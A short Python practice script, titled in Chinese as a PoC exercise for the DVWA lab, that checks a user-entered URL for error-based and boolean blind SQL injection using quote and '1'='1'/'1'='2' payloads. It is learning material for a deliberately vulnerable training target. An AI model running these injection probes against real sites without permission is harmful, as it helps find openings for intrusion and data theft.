使用Python进行的poc编写练习,针对dvwa靶场的sql注入,包括回显注入和盲注
import requests
import re
def sql_inj(url2, headers):
payload = '\''
url_last = url2[0] + '=' + payload + '&' + url2[2] + '=' + url2[3]
r = requests.get(url=url_last, headers=headers)
res = str(r.content)
if re.search('SQL syntax', res):
print('存在sql回显注入漏洞')
else:
return
def sqlblind_inj(url2, headers):
payload1 = "1' and '1'='1"
payload2 = "1' and '1'='2"
url_test1 = url2[0] + '=' + payload1 + '&' + url2[2] + '=' + url2[3]
url_test2 = url2[0] + '=' + payload2 + '&' + url2[2] + '=' + url2[3]
r1 = requests.get(url=url_test1, headers=headers)
r2 = requests.get(url=url_test2, headers=headers)
str1 = str(r1.content)
str2 = str(r2.content)
if re.search("First name", str1) and not re.search("First name", str2):
print('存在sql盲注漏洞')
else:
return
if __name__ == '__main__':
url = input('请输入测试URL:')
url2 = re.split('=|&', url)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Cookie': 'security=low; PHPSESSID=2c1f805aaa4d3cf042c42e70a1043003'
}
sql_inj(url2, headers)
sqlblind_inj(url2, headers)